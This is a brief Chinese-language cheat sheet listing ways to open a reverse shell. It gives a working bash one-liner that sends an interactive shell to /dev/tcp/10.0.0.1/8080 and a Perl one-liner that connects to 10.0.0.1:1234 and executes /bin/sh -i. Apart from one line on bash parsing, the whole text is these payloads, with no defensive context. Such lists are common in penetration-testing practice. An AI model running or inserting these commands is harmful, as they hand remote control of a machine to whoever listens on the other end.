反弹的各种姿势。
bash版本:
1 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 |
注意这个是由解析shell的bash完成,所以某些情况下不支持
perl版本:
1 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |